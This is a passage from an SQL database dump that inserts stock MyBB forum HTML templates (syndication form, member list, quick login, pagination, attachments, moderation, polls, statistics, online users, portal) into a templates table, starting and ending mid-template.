colspan=\"2\"><strong>{$lang->syndication}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_forum}</strong><br /><span class=\"smalltext\">{$lang->syndication_forum_desc}</span></td> <td class=\"trow1\" width=\"60%\">{$forumselect}</td> </tr> <tr> <td class=\"trow2\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_version}</strong><br /><span class=\"smalltext\">{$lang->syndication_version_desc}</span></td> <td class=\"trow2\" width=\"60%\"><input type=\"radio\" class=\"radio\" name=\"version\" value=\"rss2.0\" {$rss2check} />&nbsp;{$lang->syndication_version_rss2}<br /><input type=\"radio\" class=\"radio\" name=\"version\" value=\"atom1.0\" {$atom1check} />&nbsp;{$lang->syndication_version_atom1}</td> </tr> <tr> <td class=\"trow1\" width=\"40%\" valign=\"top\"><strong>{$lang->syndication_limit}</strong><br /><span class=\"smalltext\">{$lang->syndication_limit_desc}</span></td> <td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"limit\" value=\"{$limit}\" size=\"3\" /> {$lang->syndication_threads_time}</td> </tr></table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"make\" value=\"{$lang->syndication_generate}\" /></div> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('235', 'misc_syndication_feedurl', '<table border=\"0\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr><td> <strong>{$lang->syndication_generated_url}</strong><blockquote> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr><td class=\"trow1\"> {$url} </td></tr></table> </blockquote> </td></tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('236', 'memberlist_user', '<tr> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'avatar\']}</td> <td class=\"{$alt_bg}\">{$user[\'profilelink\']}<br /> <span class=\"smalltext\"> {$user[\'usertitle\']}<br /> {$usergroup[\'groupimage\']} {$user[\'userstars\']} </span></td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'regdate\']}</td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'lastvisit\']}</td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'postnum\']}</td> {$referral_bit} </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('237', 'memberlist_user_avatar', '<img src=\"{$user[\'avatar\']}\" alt=\"\" {$avatar_width_height} />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('238', 'memberlist_user_groupimage', '<img src=\"{$usergroup[\'image\']}\" alt=\"{$usergroup[\'title\']}\" title=\"{$usergroup[\'title\']}\" />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('239', 'index_loginform', '<br /><br /> <form action=\"member.php\" method=\"post\"> <input type=\"hidden\" name=\"action\" value=\"do_login\" /> <span class=\"smalltext\"><strong>{$lang->quick_login}</strong></span> <input type=\"text\" class=\"textbox\" name=\"username\" title=\"{$login_username}\" value=\"{$lang->login_username}\" onfocus=\"if(this.value == \'{$lang->login_username}\') { this.value=\'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->login_username}\'; }\" /> <input type=\"password\" class=\"textbox\" name=\"password\" title=\"{$lang->login_password}\" value=\"{$lang->login_password}\" onfocus=\"if(this.value == \'{$lang->login_password}\') { this.value=\'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->login_password}\'; }\" /> {$gobutton} </form>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('240', 'multipage_breadcrumb', '<div id=\"breadcrumb_multipage_popup\" class=\"pagination pagination_breadcrumb\" style=\"display: none;\"> {$prevpage}{$start}{$mppage}{$end}{$nextpage} </div> <script type=\"text/javascript\"> // <!-- if(use_xmlhttprequest == \"1\") { new PopupMenu(\"breadcrumb_multipage\"); } // --> </script>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('241', 'multipage', '<div class=\"pagination\"> <span class=\"pages\">{$lang->multipage_pages}</span> {$prevpage}{$start}{$mppage}{$end}{$nextpage} </div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('242', 'multipage_end', '{$lang->multipage_link_end} <a href=\"{$page_url}\" class=\"pagination_last\">{$pages}</a>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('243', 'multipage_nextpage', '<a href=\"{$page_url}\" class=\"pagination_next\">{$lang->next} &raquo;</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('244', 'multipage_page', '<a href=\"{$page_url}\" class=\"pagination_page\">{$i}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('245', 'multipage_page_current', ' <span class=\"pagination_current\">{$i}</span>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('246', 'multipage_page_link_current', ' <a href=\"{$page_url}\" class=\"pagination_current\">{$i}</a>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('247', 'multipage_prevpage', '<a href=\"{$page_url}\" class=\"pagination_previous\">&laquo; {$lang->previous}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('248', 'multipage_start', '<a href=\"{$page_url}\" class=\"pagination_first\">1</a> {$lang->multipage_link_start}', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('249', 'usercp_forumsubscriptions_none', '<tr> <td class=\"trow1\" colspan=\"5\">{$lang->no_forum_subscriptions}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('250', 'index_whosonline', '<tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->whos_online}</strong> [<a href=\"online.php\">{$lang->complete_list}</a>]</span></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$lang->online_note}<br />{$onlinemembers}</span></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('251', 'index_stats', '<tr><td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->boardstats}</strong></span></td></tr> <tr> <td class=\"trow1\"><span class=\"smalltext\"> {$lang->stats_posts_threads}<br /> {$lang->stats_numusers}<br /> {$lang->stats_newestuser}<br /> {$lang->stats_mostonline} </span> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('252', 'moderation_deletethread', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_thread}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$thread[\'subject\']} - {$lang->delete_thread}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_threads}</td> </tr> {$loginbox} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_thread}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_deletethread\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('253', 'postbit_attachments_thumbnails', '<span class=\"smalltext\"><strong>{$lang->postbit_attachments_thumbnails}</strong></span><br /> {$post[\'thumblist\']} <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('254', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"5\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"2%\">&nbsp;</td> <td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$forums} </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('255', 'forumdisplay_threadlist_rating', ' <td class=\"tcat\" align=\"center\" width=\"80\"> <span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=rating&amp;order=desc\">{$lang->rating}</a> {$orderarrow[\'rating\']}</strong></span> <script type=\"text/javascript\" src=\"jscripts/rating.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- lang.stars = new Array(); lang.stars[1] = \"{$lang->one_star}\"; lang.stars[2] = \"{$lang->two_stars}\"; lang.stars[3] = \"{$lang->three_stars}\"; lang.stars[4] = \"{$lang->four_stars}\"; lang.stars[5] = \"{$lang->five_stars}\"; // --> </script> </td> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('256', 'forumdisplay_thread', '<tr> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}{$thread_type_class}\"> {$attachment_count} <div> <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span> <div class=\"author smalltext\">{$thread[\'profilelink\']}</div> </div> </td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a>{$unapproved_posts}</td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\">{$thread[\'views\']}</td> {$rating} <td class=\"{$bgcolor}{$thread_type_class}\" style=\"white-space: nowrap; text-align: right;\"> <span class=\"lastpost smalltext\">{$lastpostdate} {$lastposttime}<br /> <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> {$modbit} </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('257', 'forumdisplay_orderarrow', '<span class=\"smalltext\">[<a href=\"{$sorturl}&amp;sortby={$sortby}&amp;order={$oppsortnext}\">{$oppsort}</a>]</span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('258', 'postbit_posturl', '<div style=\"float: right; width: auto; vertical-align: top\"><span class=\"smalltext\"><strong>{$lang->postbit_post} <a href=\"{$post[\'postlink\']}#pid{$post[\'pid\']}\">#{$postcounter}</a></strong>{$post[\'inlinecheck\']}</span></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('259', 'postbit_attachments_thumbnails_thumbnail', '<a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\"><img src=\"attachment.php?thumbnail={$attachment[\'aid\']}\" class=\"attachment\" alt=\"\" /></a>&nbsp;&nbsp;&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('260', 'postbit_attachments_images_image', '<img src=\"attachment.php?aid={$attachment[\'aid\']}\" class=\"attachment\" alt=\"\" />&nbsp;&nbsp;&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('261', 'postbit_signature', '<hr size=\"1\" width=\"25%\" align=\"left\" /> {$post[\'signature\']}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('262', 'post_attachments_attachment', '<tr> <td class=\"trow2\" width=\"1\" align=\"center\">{$attachment[\'icon\']}</td> <td class=\"trow2\" width=\"75%\" style=\"white-space: nowrap\">{$attachment[\'filename\']} ({$attachment[\'size\']})</td> <td class=\"trow2\" style=\"white-space: nowrap; text-align: center;\">{$attach_mod_options} {$attach_rem_options} {$postinsert}</td> </tr>', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('263', 'post_attachments_attachment_unapproved', '<tr> <td class=\"trow_shaded\" width=\"1\" align=\"center\">{$attachment[\'icon\']}</td> <td class=\"trow_shaded\" style=\"white-space: nowrap\"><em><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$attachment[\'size\']})</em></td> <td class=\"trow_shaded\" style=\"white-space: nowrap; text-align: center;\">{$attach_mod_options} <input type=\"submit\" class=\"button\" name=\"rem\" value=\"{$lang->remove_attachment}\" onclick=\"return Post.removeAttachment({$attachment[\'aid\']});\" /> {$postinsert}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('264', 'post_attachments_attachment_mod_approve', '<input type=\"submit\" class=\"button\" name=\"approveattach\" value=\"{$lang->approve_attachment}\" onclick=\"return Post.attachmentAction({$attachment[\'aid\']},\'approve\');\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('265', 'post_attachments_attachment_mod_unapprove', '<input type=\"submit\" class=\"button\" name=\"unapproveattach\" value=\"{$lang->unapprove_attachment}\" onclick=\"return Post.attachmentAction({$attachment[\'aid\']},\'unapprove\');\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('266', 'error_attacherror', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr> <td class=\"thead\"><strong>{$lang->error_attach_file}</strong></td> </tr> <tr> <td class=\"trow1\">{$attachedfile[\'error\']}</td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('267', 'postbit_attachments', '<br /> <br /> <fieldset> <legend><strong>{$lang->postbit_attachments}</strong></legend> {$post[\'attachedthumbs\']} {$post[\'attachedimages\']} {$post[\'attachmentlist\']} </fieldset>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('268', 'postbit_attachments_attachment', '<br />{$attachment[\'icon\']}&nbsp;&nbsp;<a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$lang->postbit_attachment_size} {$attachment[\'filesize\']} / {$lang->postbit_attachment_downloads} {$attachment[\'downloads\']})', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('269', 'postbit_attachments_attachment_unapproved', '<br /><strong>{$postbit_unapproved_attachments}</strong>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('270', 'postbit_attachments_images', '<span class=\"smalltext\"><strong>{$lang->postbit_attachments_images}</strong></span><br /> {$post[\'imagelist\']} <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('271', 'post_attachments_attachment_postinsert', '<input type=\"button\" class=\"button\" name=\"insert\" value=\"{$lang->insert_attachment_post}\" onclick=\"clickableEditor.insertAttachment({$attachment[\'aid\']});\" />', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('272', 'post_attachments_attachment_remove', '<input type=\"submit\" class=\"button\" name=\"rem\" value=\"{$lang->remove_attachment}\" onclick=\"return Post.removeAttachment({$attachment[\'aid\']});\" />', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('273', 'post_attachments_update', '<input type=\"submit\" class=\"button\" name=\"updateattachment\" value=\"{$lang->update_attachment}\" tabindex=\"12\" />', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('274', 'moderation_mergeposts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->merge_posts}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_posts}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\">{$lang->merge_posts_note}</td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->post_separator}</strong></td> </tr> <tr> <td class=\"trow2\" colspan=\"2\"><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"hr\" checked=\"checked\" /> {$lang->horizontal_rule}</label><br /><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"new_line\" /> {$lang->new_line}</label></td> </tr> {$posts} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_posts}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_mergeposts\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('275', 'moderation_mergeposts_post', '<tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td> </tr> <tr> <td class=\"{$altbg}\" valign=\"top\" align=\"center\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" checked=\"checked\" name=\"mergepost[{$post[\'pid\']}]\" value=\"1\" /></td> <td class=\"{$altbg}\">{$message}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('276', 'stats', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"> {$lang->posts} <strong>{$stats[\'numposts\']}</strong><br /> {$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br /> {$lang->members} <strong>{$stats[\'numusers\']}</strong> </td> <td class=\"trow1\" rowspan=\"3\" valign=\"top\"> {$lang->ppd} <strong>{$postsperday}</strong><br /> {$lang->tpd} <strong>{$threadsperday}</strong><br /> {$lang->mpd} <strong>{$membersperday}</strong><br /> {$lang->ppm} <strong>{$postspermember}</strong><br /> {$lang->rpt} <strong>{$repliesperthread}</strong> </td> </tr> <tr> <td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td> </tr> <tr> <td class=\"trow1\"> {$lang->newest_member} {$stats[\'newest_user\']}<br /> {$lang->members_posted} <strong>{$havepostedpercent}</strong><br /> {$lang->todays_top_poster}<br /> {$lang->popular_forum} </td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\">{$mostreplies}</td> <td class=\"trow1\" valign=\"top\">{$mostviews}</td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('277', 'polls_newpoll', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->post_new_poll}</title> {$headerinclude} </head> <body> {$header} {$preview} <form action=\"polls.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_poll}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->question}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"question\" size=\"40\" maxlength=\"240\" value=\"{$question}\" /></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->num_options}</strong><br /><span class=\"smalltext\">{$lang->max_options} {$mybb->settings[\'maxpolloptions\']}</span></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"polloptions\" size=\"10\" value=\"{$polloptions}\" />&nbsp;<input type=\"submit\" class=\"button\" name=\"updateoptions\" value=\"{$lang->update_options}\" /></td> </tr> <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_options}</strong></td> <td class=\"trow2\"><span class=\"smalltext\">{$lang->poll_options_note}</span> <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"> {$optionbits} </table> </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[multiple]\" value=\"1\" {$postoptionschecked[\'multiple\']} />&nbsp;{$lang->option_multiple}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[public]\" value=\"1\" {$postoptionschecked[\'public\']} />&nbsp;{$lang->option_public}</label> </span> </td> </tr> <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_timeout}</strong><br /><span class=\"smalltext\">{$lang->timeout_note}</span></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"timeout\" value=\"{$timeout}\" /> {$lang->days}</td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_new_poll}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_newpoll\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('278', 'member_register_agreement', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->agreement}</title> {$headerinclude} </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->agreement}</strong></td> </tr> {$coppa_agreement} <tr> <td class=\"trow1\"> <p>{$lang->agreement_1}</p> <p>{$lang->agreement_2}</p> <p>{$lang->agreement_3}</p> <p>{$lang->agreement_4}</p> <p><strong>{$lang->agreement_5}</strong></p> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"step\" value=\"agreement\" /> <input type=\"hidden\" name=\"action\" value=\"register\" /> <input type=\"submit\" class=\"button\" name=\"agree\" value=\"{$lang->i_agree}\" /> </div> </form> {$footer} </body> </html>', '-2', '123', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('279', 'stats_thread', '<a href=\"{$thread[\'threadlink\']}\"><strong>{$thread[\'subject\']}</strong></a> ({$numberbit} {$numbertype})<br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('280', 'online', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->users_online}</title> {$headerinclude} {$refresh} </head> <body> {$header} {$multipage} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->users_online}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><a href=\"online.php?sortby=username\"><span class=\"smalltext\"><strong>{$lang->on_username}</strong></span></a></td> <td class=\"tcat\" align=\"center\"><a href=\"online.php?sortby=time\"><span class=\"smalltext\"><strong>{$lang->time}</strong></span></a></td> <td class=\"tcat\" width=\"50%\"><a href=\"online.php?sortby=location\"><span class=\"smalltext\"><strong>{$lang->location}</strong></span></a></td> </tr> {$online_rows} <tr> <td class=\"tfoot\" colspan=\"3\" align=\"right\"><span class=\"smalltext\"><strong><a href=\"online.php?action=today\">{$lang->online_today}</a> | <a href=\"online.php\">{$lang->refresh_page}</a></strong></span></td> </tr> </table> <br /> {$multipage} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('281', 'portal_welcome_membertext', '<span class=\"smalltext\"><em>{$lang->member_welcome_lastvisit}</em> {$lastvisit}<br /> {$lang->since_then}<br /> <strong>&raquo;</strong> {$lang->new_announcements}<br /> <strong>&raquo;</strong> {$lang->new_threads}<br /> <strong>&raquo;</strong> {$lang->new_posts}<br /><br /> <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\">{$lang->view_new}</a><br /><a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\">{$lang->view_todays}</a> </span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('282', 'portal', '<html> <head> <title>{$mybb->settings[\'bbname\']}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\"> <tr><td valign=\"top\" width=\"200\"> {$welcome} {$pms} {$search} {$stats} {$whosonline} {$latestthreads} </td> <td>&nbsp;</td> <td valign=\"top\"> {$announcements} </td> </tr> </table> {$footer} </body> </html>', '-2', '127', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('283', 'portal_pms', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong><a href=\"{$mybb->settings[\'bburl\']}/private.php\">{$lang->private_messages}</a></strong></td> </tr> <tr> <td class=\"trow1\"> <span class=\"smalltext\">{$lang->pms_received_new}<br /><br /> <strong>&raquo; </strong> 